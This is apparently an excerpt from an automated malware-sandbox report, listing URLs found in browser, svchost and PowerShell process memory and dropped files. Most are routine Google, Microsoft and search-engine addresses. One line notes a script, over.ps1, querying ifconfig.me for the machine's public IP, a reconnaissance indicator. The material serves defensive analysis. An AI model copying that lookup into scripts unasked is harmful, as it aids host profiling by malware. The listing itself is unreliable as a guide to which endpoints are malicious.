    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmp, chromecache_490.22.dr, chromecache_493.22.drString found in binary or memory: https://apis.google.com
    Source: chrome.exe, 00000014.00000003.2519097781.0000180801884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2519677108.00001808018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2519466190.0000180801898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2519268658.0000180801888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2519010102.0000180801880000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2519649418.00001808018AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2519514826.000018080189C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2518902373.0000180801878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2518954415.000018080187C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes
    Source: msedge.exe, 00000019.00000002.2619800035.0000016A4A1B6000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2780504085.00000237529AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://assets.msn.cn/resolver/
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://assets.msn.com/resolver/
    Source: json[1].json.17.drString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://bit.ly/wb-precache
    Source: k6fcj5.17.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
    Source: k6fcj5.17.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://browser.events.data.msn.cn/
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://browser.events.data.msn.com/
    Source: Reporting and NEL.32.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://c.msn.com/
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
    Source: fcbaaa.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: service_worker_bin_prod.js.31.dr, offscreendocument_main.js.31.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
    Source: aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: chrome.exe, 00000014.00000003.2480335285.0000180800D7C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2626560437.00007A640017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2786304098.000065100017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
    Source: manifest.json.31.drString found in binary or memory: https://chrome.google.com/webstore/
    Source: chrome.exe, 00000014.00000003.2480814828.0000180800D6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485927929.0000180800D6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486041019.0000180800DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2479238710.0000180800D6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2479284713.0000180800D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485086933.0000180800DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484460475.0000180800DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2489388126.0000180800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2479306917.0000180800DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2480335285.0000180800D7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
    Source: chrome.exe, 00000014.00000003.2472991903.00001808002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
    Source: chrome.exe, 00000014.00000003.2472991903.00001808002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
    Source: chrome.exe, 00000014.00000003.2472991903.00001808002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(
    Source: chrome.exe, 00000014.00000003.2472991903.00001808002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(TrustTokenOperationsRequiringOriginTrial#all-operat
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
    Source: msedge.exe, 00000019.00000002.2626560437.00007A640017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2786304098.000065100017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.31.drString found in binary or memory: https://chromewebstore.google.com/
    Source: msedge.exe, 00000019.00000002.2626560437.00007A640017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/https://chrome.google.com/webstorezd
    Source: chrome.exe, 00000014.00000003.2466387387.00000980002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2466404835.00000980002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2473215268.00001808004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2625794461.00007A6400040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2783311609.0000651000040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.31.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: chromecache_490.22.drString found in binary or memory: https://clients6.google.com
    Source: chromecache_490.22.drString found in binary or memory: https://content.googleapis.com
    Source: k6fcj5.17.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: k6fcj5.17.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: 2cc80dabc69f58b6_0.31.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: manifest.json0.31.drString found in binary or memory: https://docs.google.com/
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
    Source: chromecache_490.22.drString found in binary or memory: https://domains.google.com/suggest/flow
    Source: manifest.json0.31.drString found in binary or memory: https://drive-autopush.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-0.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-1.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-2.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-3.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-4.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-5.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-daily-6.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-preprod.corp.google.com/
    Source: manifest.json0.31.drString found in binary or memory: https://drive-staging.corp.google.com/
    Source: chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
    Source: manifest.json0.31.drString found in binary or memory: https://drive.google.com/
    Source: chrome.exe, 00000014.00000003.2522028034.0000180801BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
    Source: chrome.exe, 00000014.00000003.2522028034.0000180801BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabNstate
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
    Source: aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: 000003.log8.31.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
    Source: 000003.log8.31.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
    Source: 000003.log8.31.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
    Source: 000003.log9.31.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
    Source: 000003.log8.31.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
    Source: 000003.log8.31.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
    Source: chromecache_493.22.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
    Source: chromecache_493.22.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
    Source: chromecache_493.22.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
    Source: chromecache_493.22.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
    Source: edb.log.21.dr, qmgr.db.21.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: svchost.exe, 00000015.00000003.2474063167.00000239C8A80000.00000004.00000800.00020000.00000000.sdmp, edb.log.21.dr, qmgr.db.21.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: chrome.exe, 00000014.00000003.2472991903.00001808002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/7
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
    Source: chrome.exe, 00000014.00000003.2472991903.00001808002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/Preperiod7_ROW_GA_CrossAppWebAra_5_percent_20240424
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
    Source: msedge.exe, 0000001D.00000002.2786876593.00006510002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
    Source: powershell.exe, 00000000.00000002.2133357506.00000241021C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmp, over.ps1String found in binary or memory: https://ifconfig.me/ip
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
    Source: k6fcj5.17.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
    Source: chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
    Source: chrome.exe, 00000014.00000003.2510164834.0000180801E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
